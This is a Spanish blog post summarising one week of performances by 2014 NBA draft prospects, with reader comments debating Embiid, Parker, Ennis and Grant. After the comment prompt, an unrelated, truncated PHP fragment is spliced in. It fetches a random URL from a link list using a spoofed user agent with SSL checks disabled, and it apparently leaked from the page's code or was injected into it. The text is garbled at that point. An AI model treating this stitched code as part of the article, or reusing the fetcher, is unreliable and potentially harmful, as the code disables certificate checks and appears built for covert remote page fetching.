Seguimiento del Draft 2014: Semana del 8 al 16 de Febrero

18 de February de 2014 por Viva_Dirk

Con un día de retraso por culpa de unos problemas técnicos y con un cambio de formato que esperemos facilite la digestión de la información, llega un nuevo resumen de las actuaciones de los nombres que más suenan para el draft. En lugar de ir por días, os mostraremos (agrupados por equipos) un resumen con la actuaciones de los jugadores de la zona noble, un resumen de la actuación del resto y, como no, el resumen de los internacionales.

Kansas: 2 victorias y 1 derrota para los Jayhawks. Joel Embiid sólo ha disputado dos de los partidos y descansó en en el último ya que venía jugando con molestias en la rodilla. El camerunés ha promediado 8.5 puntos, 9 rebotes y 2 tapones en 15 minutos y ha dejado alguna declaración en la que apunta la posibilidad de continuar un año más en Kansas. Por su parte, Andrew Wiggins ha acabado con 17.3 puntos, 4.3 rebotes y 2.3 asistencias de media con un 17 de 37 en tiros. Wayne Selden ha dejado 11.3 puntos por noche.

Duke: Dos victorias para los Blue Devils ya que el partido contra NC fue pospuesto. Nada menos que 26 puntos, 12 rebotes y 2.5 tapones de media para Jabari Parker en estas dos victorias. Gran momento para este chico. Mucho más flojo ha estado Rodney Hood con solo 10 puntos, algo que le ha costado caer algunos puestos en los mocks.

Kentucky: Balance de 2-1 para los Wildcats. Julius Randle deja unos sólidos promedios de 13.6 puntos y 10.6 rebotes que le mantienen como pick 4. James Young hizo 11.3 puntos y 4 rebotes, mientras que Willie Cauley Stein se ha quedado esta semana con solo 5 puntos y 3.3 rebotes y sigue cayendo en los mocks.

Oklahoma St: Semana marcada por la sanción a Marcus Smart por agredir a un espectador de Texas Tech. El hecho ya está más que comentado y dudo que tenga repercusión alguna en las posibilidades de Smart en ocupar un puesto muy alto en el próximo draft. En dicho partido acabó con 22 puntos. 

Indiana: 0-3 para los Hoosiers a pesar de que Noah Vonleh ha acabado la semana promediando un doble-doble (11.3 puntos y 10 rebotes) y 2 tapones. Será difícil ver a Vonleh en el top-5  pero igualmente difícil que caiga más allá de los 8 primeros .

Arizona: 1-1 para los Wildcats. Aaron Gordon ha promediado unos sólidos 15 puntos y 7.5 rebotes pero ha bajado algún puesto en los mocks. Si los mocks pronostican su elección por debajo del pick 10 no nos debería extrañar que se quedara un año más en la universidad.

Syracuse: Los Orange siguen siendo el mejor equipo de la competición y no conocen la derrota. Tyler Ennis ha completado una semana más bien discreta con 9.3 puntos y 5 asistencias mientras que Jerami Grant ja dejado 10 puntos y 9 rebotes.

Michigan St: 1-2 para los Spartans. Gary Harris protagonizó un pésimo partido frente a Wisconsin con un 3 de 20 en tiros y derrota. En el siguiente encuentro anotó 14 puntos y mejoró en el últimoc on 18. Adreian Payne ha vuelto a gran nivel: 18-9 para él.

El resto de jugadores de 1era ronda

Numerazos para Doug McDermott. 30 puntos y 5 rebotes de media con muy buenos porcentajes. Destacamos los 39 puntos que anotó para que su equipo ganase a Vilanova. Nik Stauskas anotó 12 puntos y atraviesa un momento gris que le ha costado algún puesto en los mocks. KJ McDaniels acaba la semana con unos impresionantes 27.3 puntos y 9.3 rebotes, claro aspirantes a top 20. Sam Dekker ha bajado varios puestos en los mocks y acaba con 13 puntos y 7 rebotes. Montrezl Harrell solo jugó un partido de verdad en el que hizo 22-10 y 4 tapones. No Hace falta tener en cuenta el partido que ganaron de casi 50 el domingo. TJ Warren completó una espectacular semana con 28 puntos y 7 rebotes. Kyle Anderson hizo de las suyas con 18.3 puntos, 8.6 rebotes y 7 asistencias, algo que le ha hecho subir hasta 10 puestos en algunos mocks. En cambio, su compañero Zach LaVine apunta al draft del 2015 y ha perdido minutos de juego. Mala semana para CJ Wilcox que tuvo una media de 11 puntos.

Jugadores que aparecen en 2ª ronda

Russ Smith anotó 15 puntos en su único partido de la semana. Jahii Carson se fue a un 14-8-6 y su equipo ganó a Arizona. Los sophomores AJ Hammons, Glen Robinson III y Alex Poythress tuvieron una mala semana, lo que al center le ha costado varios puestos, aunque los 3 siguen en lo más alto de la 2ª ronda. El combo guard Jordan Clarkson hizo un 19-5-4. El base Semaj Christon se quedó en 12.3 puntos y 4 asistencias, algo que ha cortado ligeramente su progresión en los mocks. Otro base, Elfrid Payton si ha tenido una gran semana con 18.3 puntos, 7.6 rebotes y 5.6 asistencias, y solo su nulo tiro exterior le aleja de la 1era ronda. Regularidad total para los veteranos Dwight Powell, LaQuinton Ross, Cory Jefferson, Jabari Brown, Jarnell Stokes y Aaron Craft  que casi calcaron sus números de la temporada. Floja semana para Deonte Burton que se quedó en 12 puntos respecto a los 20 que promedia, y gran semana para Devyn Marble con más de 20 puntos por noche. Jordan McRae se fue hasta los 27 puntos y hace méritos para ser drafteado.

Jugadores internacionales

Esta semana hemos podido asistir a un gran duelo entre Dario Saric y Vasilije Micic. El alero se fue a los 19 puntos, 7 rebotes y 5 asistencias mientras que el base acabó con 18 puntos, 8 asistencias y 4 robos. Flojos partidos en cambio de los centers Jusuf Nurkic y Walter Tavares con 9 y 5 puntos respectivamente. Algo mejor estuvo en cambio Clint Capela con 10 puntos y 7 rebotes. Semana para olvidar de Bogdan Bogdanovic con una serie de tiro de 3 de 15 para 7 puntos. Alessandro Gentile fue baja esta jornada.

Comenta

5 comentarios a esta entrada

  1. jhc dice:
    #1

    De momento Paker lo mejorcito de cara al Draft, pero claro, un 7 pies como Embiid siempre será preferido

      Citar

  2. Ruxixon dice:
    #2

    McDermott es una delicia como jugador,y con el añadido de ser un jugador senior.Este es un tio que como caiga un poco y te lo coja un señor entrenador como Popovich o similares,hace carrera NBA.Por otro lado,¿no hay un poquito de hype con Ennis?Y ya de paso con Grant…no sé,no creo que estén todavía para dar el salto y en nbadraft los colocan dentro de la lottery.Creo que son el ejemplo más claro de cómo afecta los resultados del equipo a los mocks.

    Ojito a esos problemas físicos en Embiid,que en un center de 7 pies tan joven seguro que siembra dudas en los GM de la liga.

    En fin,es el año que más estoy siguiendo la NCAA y se me está haciendo muy corto,ya el mes que viene tenemos la locura.Hay ganas de ver a los grandes cuando se corte el bacalao.

    Gran trabajo Viva,como siempre.Y me parece una gran idea agrupar los jugadores por los equipos rankeados.

      Citar

  3. Viva_Dirk dice:
    #3

    Si que hay algo de hype con Ennis ahora mismo, puede ser el mejor base puro del draft si no contamos a Smart como tal, es un playmaker de verdad, con buen IQ y con muy buena cabeza segun se lee en todos sitios. Ahora bien, salvo Orlando o Lakers no hay ningun equipo de la zona alta cuya prioridad sea un base, asi que dependerá bastante de donde les toque elegir a estos donde sea elegido. Grant es un caso mas de ala-pivot con gran movilidad y poco peso para pelear con jugadores grandes, duro, currante y con gran físico para correr y defender….y con nulo tiro exterior.

      Citar

  4. Denise dice:
    #4

    Viva_Dirk:
    Si que hay algo de hype con Ennis ahora mismo, puede ser el mejor base puro del draft si no contamos a Smart como tal, es un playmaker de verdad, con buen IQ y con muy buena cabeza segun se lee en todos sitios. Ahora bien, salvo Orlando o Lakers no hay ningun equipo de la zona alta cuya prioridad sea un base, asi que dependerá bastante de donde les toque elegir a estos donde sea elegido.

    Respecto a Ennis y Orlando, se habla que la intención de los Magic es pillar a Parker/Wiggins en su propia elección que probablemente será un Top 5. Y después en el pick 10-14 que les llega de NY/Denver van a ir a saco a por Ennis.
    Si no pueden pillar a Parker/Wiggins, se decantarán por Smart y entonces en su 2º elección ya no irán a por Ennis

      Citar

  5. Ruxixon dice:
    #5

    Conclusiones después del Syracuse @ Duke:

    – Jabari es un jugón en toda regla.Me parece más nº1 él que Embiid,descartando a todos los demás de esa lucha,teniendo en cuenta que de las franquicias con peores record a día de hoy,hace falta mucho más un jugador que ilusione -creo que es más fácil que enganche un anotador desde el punto de vista del aficionado- o que aporte tiro exterior.Ahora mismo,sólo Sacramento,si piensan que pueden combinar bien Cousins-Embiid,Lakers(mirando a futuros,una pareja Love-Embiid puede ser una gozada,aunque los rumores apuntan a Exum),Boston,Cleveland y Denver,parecen los destinos donde Embiid pueda encajar de manera ideal.Opinión personal aunque en ningún caso bajaría a Embiid del 3.

    – Ennis me produce muchísimas dudas de cara a su salto a pro.No tiene el físico ni las condiciones atléticas para ser un PG de primer nivel.Luego está considerado buen defensor,pero dentro del sistema de Syracuse lo cual le beneficia.

    – Un añito más en la NCAA pondría muy arriba a Jerami Grant.Lo veo con mucho potencial pero no le iría nada mal adquiriendo fundamentos y desarrollando un tiro medianamente potable para ser un jugador más completo,algo importante pues es muy fino para jugar de 4,en la NBA,con ese cuerpo se vería obligado a jugar de 3,lo cual no le beneficiaría nada.Ayer soltó alguna piedra que madre mía.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>